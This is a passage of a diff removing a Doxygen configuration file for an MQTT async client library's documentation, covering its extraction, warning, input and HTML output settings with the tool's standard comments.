-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTAsync_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src/MQTTAsync.h \
-                         @PROJECT_SOURCE_DIR@/src/MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain images that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# none of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# The DOCSET_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The DOCSET_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider setting DISABLE_INDEX to YES when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANSPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want the formulas to look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
